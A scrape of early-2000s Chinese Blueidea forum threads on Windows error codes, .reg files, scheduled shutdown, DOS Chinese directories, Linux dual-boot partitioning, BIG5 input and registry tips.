0X0027 磁盘已满
0X0036 网络繁忙
0X003B 网络发生意外的错误
0X0043 网络名称找不到
0X0050 文件已经存在
0X0052 无法建立目录或文件
0X0053 INT24失败(什么意思？还请高手指点站长一二)
0X006B 因为代用的磁盘尚未插入，所以程序已经停止
0X006C 磁盘正在使用中或被锁定
0X006F 文件名太长
0X0070 硬盘空间不足
0X007F 找不到指定的程序
0X045B 系统正在关机
0X045C 无法中止系统关机，因为没有关机的动作在进行中
0X046A 可用服务器储存空间不足
0X0475 系统BIOS无法变更系统电源状态
0X047E 指定的程序需要新的windows版本
0X047F 指定的程序不是windwos或ms-dos程序
0X0480 指定的程序已经启动，无法再启动一次
0X0481 指定的程序是为旧版的 windows所写的
0X0482 执行此应用程序所需的程序库文件之一被损
0X0483 没有应用程序与此项操作的指定文件建立关联
0X0484 传送指令到应用程序无效
0X05A2 指定的装置名称无效
0X05AA 系统资源不足，无法完成所要求的服务
0X05AB 系统资源不足，无法完成所要求的服务
0X05AC 系统资源不足，无法完成所要求的服务
0X06B9 资源不足，无法完成操作

情归秋雪缠绵叶，恨是西风寂寞花。最痛处，别后离愁… …

Blueidea Web Team
Moderator Of Photoshop & Imagerady Forum

上一贴 | 下一贴
快速回复 主题：windows蓝屏代码
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


如何把文件保存为.reg格式? - 经 典 论 坛

计算机技术
如何把文件保存为.reg格式?

上一贴 | 下一贴
发表人 | 主题: 如何把文件保存为.reg格式?
belle 终级用户 积分：456 发帖：131 来自： 注册：2002-02-23 | 发表于 2002-03-08 00:10:58 按此观看belle的个人资料 按此发邮件给belle 收藏该主题供以后查看 发送悄悄话给belle 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看belle的IP 请问如何把下面的文件保存为.reg格式 REGEDIT4 [HKEY_CLASSES_ROOT\.htm\OpenWithList\Dreamweaver] [HKEY_CLASSES_ROOT\.htm\OpenWithList\Dreamweaver\shell] [HKEY_CLASSES_ROOT\.htm\OpenWithList\Dreamweaver\shell\edit] [HKEY_CLASSES_ROOT\.htm\OpenWithList\Dreamweaver\shell\edit\command] @="\"D:\\program files\\dreamweaver.exe\" \"%1\""
浸食·花葬 极度色郎 积分：7812 发帖：2959 来自：|翅膀| 注册：2001-07-09 | 发表于 2002-03-08 01:40:11 按此观看浸食·花葬的个人资料 按此发邮件给浸食·花葬 访问浸食·花葬的主页 浸食·花葬 的 oicq 是7368317,查看 7368317 的资料 发送悄悄话给浸食·花葬 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看浸食·花葬的IP .... 新建一.txt文件 把这些copy进去 然后改扩展名为.reg 幕末 —— 京都に人斬り拔刀齋と呼ばれた志士がぃた. 修羅さながらに人を斬り.その血刀を以って新 時代『明治』を切り拓ぃたその男は.動亂の 終結と共に人々の前から姿を消した ——
birder 终级用户 积分：634 发帖：270 来自： 注册：2001-06-19 | 发表于 2002-03-08 08:39:27 按此观看birder的个人资料 按此发邮件给birder birder 的 oicq 是68656054,查看 68656054 的资料 发送悄悄话给birder 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看birder的IP 如果你的文件没有显示后缀名，请随便打开一个文件夹， 在查看/文件夹选项中，查看标签中去掉“隐藏已知文件类型扩展名”选项。 在荆棘中放歌~~
belle 终级用户 积分：456 发帖：131 来自： 注册：2002-02-23 | 发表于 2002-03-08 13:46:18 按此观看belle的个人资料 按此发邮件给belle 发送悄悄话给belle 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看belle的IP 谢谢各位!!
上一贴 | 下一贴
快速回复 主题：如何把文件保存为.reg格式?
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙


关于定时关机 - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
关于定时关机

上一贴 | 下一贴
发表人 | 主题: 关于定时关机
wx@ay 看不懂 积分：7424 发帖：5353 来自：ay.ha.cn 注册：1999-12-23 | 发表于 2002-03-10 01:21:43 wx@ay 的 oicq 是1850777,查看 1850777 的资料 收藏该主题供以后查看 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 已知WIN98下可以利用计划任务实现定时关机功能。 那么WIN2K SERVER下可否实现？（HOHO，我不知道WIN2K SERVER下的计划任务在哪里 [image] ） 如果不能，有哪个软件可以实现吗？（请给出名字即可，谢谢！） 我实验了几个都不行的说 PCAP定时关机软件可以走到“您现在可以安全的关闭计算机了”这一步。 但是我在开始中选关机是可以直接关掉的。 Think like a Genius. 有些爱情象指甲，有些象牙齿。 指甲能不断生长，不要的就剪掉。 而牙齿就不同。 象牙齿的爱情会不同，它会永远！ 小心蛀牙！！！
Fly Developer 积分：4146 发帖：1028 来自： 注册：2001-10-31 | 发表于 2002-03-10 16:41:47 按此观看Fly的个人资料 按此发邮件给Fly Fly 的 oicq 是7969660,查看 7969660 的资料 发送悄悄话给Fly 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Fly的IP Task Scheduler 允许程序在指定时间运行。 应该有呀，服务都有 我的虚荣心是用十句话说出别人用一本书讲出的东西和别人用一本书没有讲出的东西. ----尼采
onlysnake 终级用户 积分：2127 发帖：739 来自：经典_流氓屯 注册：2002-01-10 | 发表于 2002-03-10 17:36:46 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP 很多软件都有支持的，各大软件下载网站都有的呀！ 我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！ Blueidea Counter Strike Team =Blueidea=onlysnake
Fly Developer 积分：4146 发帖：1028 来自： 注册：2001-10-31 | 发表于 2002-03-10 18:58:57 按此观看Fly的个人资料 按此发邮件给Fly Fly 的 oicq 是7969660,查看 7969660 的资料 发送悄悄话给Fly 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Fly的IP 找到了，Server的计划任务在开始－－＞程序－－＞附件－－＞系统工具 里 另外，如果第三方的关机软件不好使，可以试试找找XP的shutdown.exe，一个DOS界面的关机程序，复制到SERVER的SYSTEM32下就可以，它可以实现对SERVER的定时关机 我的虚荣心是用十句话说出别人用一本书讲出的东西和别人用一本书没有讲出的东西. ----尼采
wx@ay 看不懂 积分：7424 发帖：5353 来自：ay.ha.cn 注册：1999-12-23 | 发表于 2002-03-10 19:20:02 wx@ay 的 oicq 是1850777,查看 1850777 的资料 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 我也找到了。 阿达关机器3.00版，可以实现我的想法了。 Think like a Genius. 有些爱情象指甲，有些象牙齿。 指甲能不断生长，不要的就剪掉。 而牙齿就不同。 象牙齿的爱情会不同，它会永远！ 小心蛀牙！！！
上一贴 | 下一贴
快速回复 主题：关于定时关机
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


如何在DOS下进入中文目录？ - 经 典 论 坛

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙

计算机技术
如何在DOS下进入中文目录？

上一贴 | 下一贴
发表人 主题: 如何在DOS下进入中文目录？
birder

终级用户
积分：634
发帖：270
来自：
注册：2001-06-19
 发表于 2002-03-14 09:52:11 按此观看birder的个人资料 按此发邮件给birder birder 的 oicq 是68656054,查看 68656054 的资料 收藏该主题供以后查看 发送悄悄话给birder 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看birder的IP
没有中文环境，如何进入中文目录？

在荆棘中放歌~~
dancing

叶恨花
现任版主
积分：4737
发帖：2230
来自：|二进制情感天空|
注册：2000-12-11
 发表于 2002-03-14 10:01:17 按此观看dancing的个人资料 按此发邮件给dancing 发送悄悄话给dancing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看dancing的IP
Windows不是自己带着PDOS吗？

情归秋雪缠绵叶，恨是西风寂寞花。最痛处，别后离愁… …

Blueidea Web Team
Moderator Of Photoshop & Imagerady Forum

F鹰

超级用户
积分：313
发帖：94
来自：
注册：2002-02-27
 发表于 2002-03-14 10:59:44 按此观看F鹰的个人资料 按此发邮件给F鹰 F鹰 的 oicq 是105454121,查看 105454121 的资料 发送悄悄话给F鹰 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看F鹰的IP
装UCDOS

=BULEIDEA=SOS
barry

终级用户
积分：731
发帖：371
来自：上海
注册：2001-01-29
 发表于 2002-03-14 13:54:30 按此观看barry的个人资料 按此发邮件给barry 访问barry的主页 barry 的 oicq 是24319347,查看 24319347 的资料 发送悄悄话给barry 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看barry的IP
cd windows/command
pdos95.bat

A bosom friend afar brings a distant land near.
海内存知己,天涯若比邻
自在

终级用户
积分：1179
发帖：322
来自：京·北
注册：2002-03-04
 发表于 2002-03-14 23:19:05 按此观看自在的个人资料 按此发邮件给自在 自在 的 oicq 是1292510,查看 1292510 的资料 发送悄悄话给自在 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看自在的IP
在窗口模式下，利用复制 粘贴。

修 身　·　齐 家　·　治 业　·　平 天 下
wellcome to visit our BBS　BLUELUNIX
bb

初级用户
积分：85
发帖：36
来自：
注册：2001-06-07
 发表于 2002-03-15 00:06:23 按此观看bb的个人资料 按此发邮件给bb 发送悄悄话给bb 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看bb的IP
birder在上个帖子中说
引用:
没有中文环境，如何进入中文目录？

在98/ME中
可以在MS-DOS运行PDOS95
这样就可以看到中文了
不过不知道在2000中怎么实现这功能？

happyseven

众生无我
积分：3129
发帖：2086
来自：无
注册：2001-03-08
 发表于 2002-03-15 00:18:10 按此观看happyseven的个人资料 按此发邮件给happyseven happyseven 的 oicq 是5849467,查看 5849467 的资料 发送悄悄话给happyseven 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看happyseven的IP
2000是纯32位系统，没有dos
在命令提示符下是可以输入中文的

Blueidea Web Team
Moderator Of Amphitheater Forum

天将降大任於斯人也 必先苦其心志 劳其筋骨 饿其体肤 空乏其身 行拂乱其所为 所以动心忍性 增益其所不能
bb

初级用户
积分：85
发帖：36
来自：
注册：2001-06-07
 发表于 2002-03-15 00:24:38 按此观看bb的个人资料 按此发邮件给bb 发送悄悄话给bb 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看bb的IP
happyseven在上个帖子中说
引用:
2000是纯32位系统，没有dos
在命令提示符下是可以输入中文的

这个我知道
但是我想说的是在2000的CMD中运行一些DOS程序
在程序中就看不到中文了？
是了，知道怎么装UCDOS吗？
happyseven

众生无我
积分：3129
发帖：2086
来自：无
注册：2001-03-08
 发表于 2002-03-15 00:52:18 按此观看happyseven的个人资料 按此发邮件给happyseven happyseven 的 oicq 是5849467,查看 5849467 的资料 发送悄悄话给happyseven 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看happyseven的IP
想装dos，前提是你的C盘不能大于2G，因为dos不认识fat32分区

然后先安装dos，再安装其他的系统

Blueidea Web Team
Moderator Of Amphitheater Forum

天将降大任於斯人也 必先苦其心志 劳其筋骨 饿其体肤 空乏其身 行拂乱其所为 所以动心忍性 增益其所不能
蓝色

管理员|蓝色
积分：13927
发帖：6011
来自：China
注册：2000-06-16
 发表于 2002-03-15 01:06:14 按此观看蓝色的个人资料 该用户不允许显示它的电子邮件 访问蓝色的主页 发送悄悄话给蓝色 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看蓝色的IP
还用什么UCDOS啊。已经过时了的东西。

现在文件的命名规则不是再三的强调只能用英文吗？

解决方案就是，忘记DOS，用英文命名。

happyseven 95版的 dos 就已经能识别 fat32了。

最后回答你的问题，对于不支持中文的纯dos程序，最好把目录改名为英文，其它方法都是治标不治本。

我错了，以前我是死不承认，现在需要常常认错。
认错后，再听那掠过林梢的歌唱。

Blueidea Web Team
Team Leader

imacwei

终级用户
积分：2344
发帖：1077
来自：China.Jiangs
注册：2001-07-23
 发表于 2002-03-15 16:52:57 按此观看imacwei的个人资料 按此发邮件给imacwei 访问imacwei的主页 imacwei 的 oicq 是36110975,查看 36110975 的资料 发送悄悄话给imacwei 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看imacwei的IP
为了方便，还是使用英文名好，兼容性强！
98下可以使用Pdos95进入中文系统，2000下没用过，不知道了！

Loading…………
WINDOWS2000-SP2+IE5.5
FIREWORKS,the solution for professional Web graphic design and production.
Press Anykey To Continue…

iMacWei
有时好心的坏蛋

终级用户
积分：723
发帖：247
来自：广东
注册：2001-11-20
 发表于 2002-03-15 16:54:15 按此观看有时好心的坏蛋的个人资料 按此发邮件给有时好心的坏蛋 访问有时好心的坏蛋的主页 有时好心的坏蛋 的 oicq 是7658826,查看 7658826 的资料 发送悄悄话给有时好心的坏蛋 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看有时好心的坏蛋的IP
也可以等到我们开发出中方DOS系统的时候，
那时就像聊天一样了。
我们努力吧

这家伙很懒，什么也没有留下

http://idiot.sharella.com

上一贴 | 下一贴
快速回复 主题：如何在DOS下进入中文目录？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


又是这个问题！！！ - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
又是这个问题！！！

上一贴 | 下一贴
发表人 | 主题: 又是这个问题！！！
破孩 高级用户 积分：154 发帖：55 来自： 注册：2001-10-05 | 发表于 2002-01-03 18:58:59 按此观看破孩的个人资料 该用户不允许显示它的电子邮件 访问破孩的主页 收藏该主题供以后查看 发送悄悄话给破孩 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看破孩的IP 我的机上装了98和Linux,觉的98的功能实在是不好， 想装上xp，有什么方法可以使Linux不用重装还能留 着用，快些告诉我呀！！！！！！！！！！！
大哥 超级用户 积分：322 发帖：112 来自： 注册：2001-12-20 | 发表于 2002-01-03 19:27:25 按此观看大哥的个人资料 该用户不允许显示它的电子邮件 访问大哥的主页 发送悄悄话给大哥 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看大哥的IP 你的LILO是装在MBR上的话，需要做一张Linux启动软盘，然后装WinXP，然后用软盘启动进入Linux，再次安装LILO即可。 如果是装在First Record of Linux Partion的话，只要改变启动分区即可，无须考虑破坏问题。 老哥我知道的就这么多了。
破孩 高级用户 积分：154 发帖：55 来自： 注册：2001-10-05 | 发表于 2002-01-04 09:37:08 按此观看破孩的个人资料 该用户不允许显示它的电子邮件 访问破孩的主页 发送悄悄话给破孩 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看破孩的IP 再安装lilo？ 我不太会呀，怎么来？？ 如果是装在first record of linux partion 的话要改变启动分区？ 又要怎么样呀？ 谢谢老哥了，快告诉我吧！！！！！！ （我们linux菜鸟很需要你这样的人帮忙呀）
破孩 高级用户 积分：154 发帖：55 来自： 注册：2001-10-05 | 发表于 2002-01-04 16:21:17 按此观看破孩的个人资料 该用户不允许显示它的电子邮件 访问破孩的主页 发送悄悄话给破孩 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看破孩的IP 老哥呀，快告诉我我急用呀！！！！！
啸 无意 现任版主 积分：6225 发帖：2154 来自： 注册：2000-08-01 | 发表于 2002-01-23 02:33:58 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP 很简单，只要你手头上有linux的启动盘（一般安装的时候都会让你创建的，如果没有创建可以利用安装的光盘创建一张）。 首先建议你把c盘的98留下，xp装在其他分区上（最好有2M以上的可用空间）。装好xp以后，用linux的启动盘启动，进入linux，运行一遍lilo命令（记得以root身份登陆）。然后取出linux的启动盘，重新启动，就行了。 之所以建议保留98是为了在xp出问题的时候可以利用它来做一些事，毕竟是一个完整的操作系统，拿来应急是很管用的，而且才200多M,对于大硬盘来说是小case了（一个xp的系统备份就300多M,用它还不如留98 [image] ） 宠辱不惊，坐看庭前花开花落；去留无意，任天上云卷云舒...... Blueidea Web Team. Moderator Of Computer Technology Forum
上一贴 | 下一贴
快速回复 主题：又是这个问题！！！
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


装过REDLINUX 7。2的都给我进来！！ - 经 典 论 坛

计算机技术
装过REDLINUX 7。2的都给我进来！！

上一贴 | 下一贴
发表人 主题: 装过REDLINUX 7。2的都给我进来！！
软硬兼施

终级用户
积分：603
发帖：361
来自：衡阳
注册：2001-08-03
 发表于 2002-01-14 17:13:23 按此观看软硬兼施的个人资料 按此发邮件给软硬兼施 软硬兼施 的 oicq 是18245854,查看 18245854 的资料 收藏该主题供以后查看 发送悄悄话给软硬兼施 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看软硬兼施的IP
偶今天装REDLINUX7。2，是第一次安装碰到了一点小麻烦

我的机器先安装了WIN2K的，硬盘IBM40G！我在WIN2K下专门腾出一个FAT32格式的6G大小的分区给LINUX，就是分区的时候不知道该动哪了！ 看了半天的说明书还是看不明白……怎么办呀，我是选自动还是手动还是在LINUX分区呀？？？如何弄那东西呢？

PS：我都切换好几次了没次都没安装成功，好烦躁

^^
bigboy

初级用户
积分：52
发帖：19
来自：
注册：2001-02-21
 发表于 2002-01-15 09:05:38 按此观看bigboy的个人资料 按此发邮件给bigboy 发送悄悄话给bigboy 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看bigboy的IP
我的机器是win2000pro，可是我安装成功了！双系统并存。
步骤很简单，先用分区软件给linux创造ex2分区和swap交换分区，然后用linux启动盘启动，在选择安装时用“已经存在的分区，重新格式化安装”系统会自动安装的，对原来的windows没有任何影响！
祝你好运！
ldh2001@hotmail.com
啸

无意
现任版主
积分：6225
发帖：2154
来自：
注册：2000-08-01
 发表于 2002-01-15 09:44:13 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP

你先找象pqmagic分区大师这样的硬盘工具，把你预留出来的那个区删掉，然后用linux的安装盘启动，安装程序就会显示你机子上可利用的空间，接着就按说明书上做就是了，这里有几点需要提醒的是：

1、用pqmagic删除分区后不用把分区再格式化成ext2格式的，redhad安装程序里的分区工具自己会做，而且应该做得比pq好。

2、仔细看说明书上关于分区的部分，上面详细的说明你应该怎样设定linux的分区，对于初次安装linux的，可以考虑就分两个区:交换区和根区。先建立交换区，大小设为130M,然后把剩下的空间都设为根区（\）.事实上想你这样的大空间建立象 /user 这样的分区是挺有必要的，等你以后用熟了可以考虑多分几个区。

3、如果使用其他的linux安装程序，一般会有让你选择自动安装还是自定义安装，如果你想在你的机子保留双 操作系统，就一定要选择自定义安装，如果选择自动安装，你整个硬盘就会全部格成ext2格式的，到时真是欲哭无泪呀（我有过这样的经历，两年多的数据呀 [image] ）

因为你的另一个系统是2000，可能还会遇到一些问题，你可以看看这里：
http://www.blueidea.com/bbs/NewsDetail.asp?id=290111

宠辱不惊，坐看庭前花开花落；去留无意，任天上云卷云舒......

Blueidea Web Team.
Moderator Of Computer Technology Forum

cjj31

方与圆
积分：3191
发帖：1148
来自：乡下
注册：2000-07-05
 发表于 2002-01-15 20:54:04 按此观看cjj31的个人资料 按此发邮件给cjj31 发送悄悄话给cjj31 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cjj31的IP
把FAT32的分区，格成FAT的应该能装！
或者用PQ建个LINUX的分区，再建个LINUX SWAP区

还有你的分区要主分区，逻辑分区装不起来！

hda1:硬盘的第一个主分区
hda2:...........二............

好好学习，天天向上
交友：MSN:cjj8110@hotmail.com
技术交流：OICQ:7777435
上一贴 | 下一贴
快速回复 主题：装过REDLINUX 7。2的都给我进来！！
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


如何在winXP下输入繁体BIG码? - 经 典 论 坛

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙

计算机技术
如何在winXP下输入繁体BIG码?

上一贴 | 下一贴
发表人 | 主题: 如何在winXP下输入繁体BIG码?
高风 终级用户 积分：487 发帖：402 来自：重庆—成都 注册：2001-01-04 | 发表于 2002-03-04 11:24:16 按此观看高风的个人资料 按此发邮件给高风 访问高风的主页 高风 的 oicq 是87468690,查看 87468690 的资料 收藏该主题供以后查看 发送悄悄话给高风 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看高风的IP 有些输入法必须要BIG5输入,请教! 不要说要切换系统区域设置……有没有什么软件？ 南台静坐一炉香 终日凝然万虑忘 不是息心去妄想 都缘无事可商量 ……………………………………………
belle 终级用户 积分：456 发帖：131 来自： 注册：2002-02-23 | 发表于 2002-03-04 12:27:15 按此观看belle的个人资料 按此发邮件给belle 发送悄悄话给belle 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看belle的IP 用红叶五笔繁体版，直接可以输入.我一直都在用
yunbin 经典强盗 现任版主 积分：2397 发帖：1033 来自：火星 注册：2001-09-27 | 发表于 2002-03-04 12:37:02 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP 普通的微软拼音输入法直接有简繁切换~ A man can succeed at almost anything for which he has unlimited enthusiasm. Blueidea Web Team Moderator Of Computer Technology Forum
上一贴 | 下一贴
快速回复 主题：如何在winXP下输入繁体BIG码?
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


注册表小技巧. - 经 典 论 坛

计算机技术
注册表小技巧.

上一贴 | 下一贴
发表人 主题: 注册表小技巧.
len

SlowHorse
积分：1198
发帖：572
来自：hebei
注册：2001-09-29
 发表于 2002-01-23 14:00:07 按此观看len的个人资料 按此发邮件给len 访问len的主页 len 的 oicq 是3248586,查看 3248586 的资料 收藏该主题供以后查看 发送悄悄话给len 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看len的IP
一般编辑注册表后,要重启才能生效.其实不必重启就可以.
编辑注册表后,按下alt+ctrl+del键,出现关闭程序对话框,选中'Explorer'选项,点击结束任务,会出现关机对话框,选择否.等一会儿,会出现结束任务对话框,选择结束任务,之后注册表的更改就生效了.

UFO Bulletin Board ====> 不明飞行物
foolishdog

终级用户
积分：938
发帖：253
来自：湖南
注册：2001-08-16
 发表于 2002-01-23 15:23:13 按此观看foolishdog的个人资料 该用户不允许显示它的电子邮件 foolishdog 的 oicq 是84357477,查看 84357477 的资料 发送悄悄话给foolishdog 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看foolishdog的IP
呵呵~~ 试试~！

设计就是灵感的实物！
灵感是设计的动力！
yunbin

经典强盗
现任版主
积分：2397
发帖：1033
来自：火星
注册：2001-09-27
 发表于 2002-01-23 16:26:45 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
其中间隔时间应该是9秒~

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

天外飞猪

经典飞猪
积分：2196
发帖：909
来自：AnHui
注册：2001-11-16
 发表于 2002-01-23 16:53:46 按此观看天外飞猪的个人资料 按此发邮件给天外飞猪 访问天外飞猪的主页 天外飞猪 的 oicq 是131433,查看 131433 的资料 发送悄悄话给天外飞猪 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看天外飞猪的IP
经典强盗，好久不见你了
上面那种方法用了一下，发现任务栏上的东西都没了

[这消息被天外飞猪编辑过(编辑时间2002-01-23 16:54:39)]

yunbin

经典强盗
现任版主
积分：2397
发帖：1033
来自：火星
注册：2001-09-27
 发表于 2002-01-23 17:18:26 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
天外飞猪在上个帖子中说
引用:
经典强盗，好久不见你了
上面那种方法用了一下，发现任务栏上的东西都没了

强迫explorer重新加载了~不算重新启动 其他东西也就都自动不加载的~除了系统自带的~

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

不知道

终级用户
积分：682
发帖：201
来自：
注册：2001-08-17
 发表于 2002-01-23 17:31:28 按此观看不知道的个人资料 按此发邮件给不知道 发送悄悄话给不知道 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看不知道的IP
这种技巧不提倡使用。

知之为知之，不知为不知！！
arrive

终级用户
积分：1298
发帖：433
来自：大连
注册：2000-12-02
 发表于 2002-01-25 02:13:23 按此观看arrive的个人资料 按此发邮件给arrive 访问arrive的主页 arrive 的 oicq 是7902765,查看 7902765 的资料 发送悄悄话给arrive 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看arrive的IP
这叫重起桌面!

Нельзя выпустить из руквозможностъ,которая случается в жизнь.
中国坛中文网——网络技术版www.chinafen.com
上一贴 | 下一贴
快速回复 主题：注册表小技巧.
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


如何锁住注册表？ - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
如何锁住注册表？

上一贴 | 下一贴
发表人 | 主题: 如何锁住注册表？
ajiao 终级用户 积分：575 发帖：182 来自：0412 注册：2001-03-14 | 发表于 2002-01-25 13:26:18 按此观看ajiao的个人资料 按此发邮件给ajiao ajiao 的 oicq 是870922,查看 870922 的资料 收藏该主题供以后查看 发送悄悄话给ajiao 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ajiao的IP 不让其他代码更改信息，就不用每次改来改去的，98的机器，谢谢了。 到底有没有无需置疑的事情呢？
